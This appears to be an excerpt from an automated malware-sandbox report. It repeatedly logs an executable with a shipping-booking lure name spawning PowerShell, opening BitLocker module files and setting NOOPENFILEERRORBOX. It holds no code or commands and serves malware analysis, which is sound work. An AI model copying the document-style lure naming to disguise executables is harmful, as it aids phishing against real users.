Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
